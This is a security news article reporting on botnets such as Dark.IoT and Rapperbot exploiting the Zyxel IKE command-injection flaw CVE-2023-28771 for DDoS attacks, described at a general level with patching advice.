Thursday, February 22, 2024

Critical Zyxel Firewall Injection Flaw Exploited to Conduct DDoS Attacks

Increased botnet activity targeting vulnerability(CVE-2023-28771) in Zyxel devices has become a major concern to its users.

This vulnerability lets the unauthorized attacker execute the arbitrary code by sending a specifically crafted packet to the targeted device.

Since CISA added this vulnerability to the Known Exploited vulnerability, the surge of the attack has increased, and the severity of the flaw is rated as 9.8.

According to FortiGuard researchers, multiple botnets, including Dark.IoT-a variant based on Mirai and botnet that can perform customizable DDOS attacks was involved in targeting the vulnerability.

Botnet activity

Analysis of Attack:

The traffic has been observed across multiple regions, such as Central America, North America, and East and South Asia.

Threat actors specifically target the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices.

Later, They utilize curl or wget tools to download scripts to tailor MIPS architecture for further malicious actions.

The initial scripts downloaded rename themselves and execute zywall parameters to ensure the connectivity of ZyXEL vulnerability.

Additional scripts associated with Rapperbot malware were downloaded from a different server which further downloads MIPS script files to make persistence.

This shows threat actors utilized multiple servers for this campaign to compromise the ZyXEL devices.

Threat actors update their tactics and techniques frequently within a short time frame to maximize the compromised device.

As said earlier, one of the botnets employed by the threat actor is Darkā€”Iot which utilizes an openNIC server for DNS resolution and communication with the C2 server.

Devices with known vulnerabilities should be patched and updated as soon as possible to prevent attacks and compromises.

Once the victim system receives the attack command, it starts a DDoS attack on a specific IP address and port number. One example of this DDoS attack traffic is shown below.



Latest articles

Earth Preta Hackers Abuses Google Drive to Deploy DOPLUGS Malware

Threat actors abuse Google Drive for several malicious activities due to its widespread use,...

Swiggy Account Hacked, Hackers Placed Orders Worth Rs 97,000

In a startling incident underscoring the growing menace of cybercrime, a woman's Swiggy account...

Beware of VietCredCare Malware that Steals businesses’ Facebook Accounts

A new cybersecurity threat targeting Facebook advertisers in Vietnam, known as VietCredCare, has emerged....

Google Chrome 122 Update Addresses Critical Security Vulnerabilities

Google has recently unveiled Chrome 122, a significant milestone for the widely used web...

New Malicious PyPI Packages Use DLL Sideloading In A Supply Chain Attack

Researchers have discovered that threat actors have been using open-source platforms and codes for...

New Mingo Malware Attacking Linux Redis Servers To Mine Cryptocurrency

The malware, termed Migo by the creators, attempts to infiltrate Redis servers to mine cryptocurrency on...

Security Onion 2.4.50 Released for Defenders With New Features

Security Onion Solutions has recently rolled out the latest version of its network security...

Live Account Takeover Attack Simulation

Live Account Take Over Attack

Live Webinar on How do hackers bypass 2FA ,Detecting ATO attacks, A demo of credential stuffing, brute force and session jacking-based ATO attacks, Identifying attacks with behaviour-based analysis and Building custom protection for applications and APIs.

Related Articles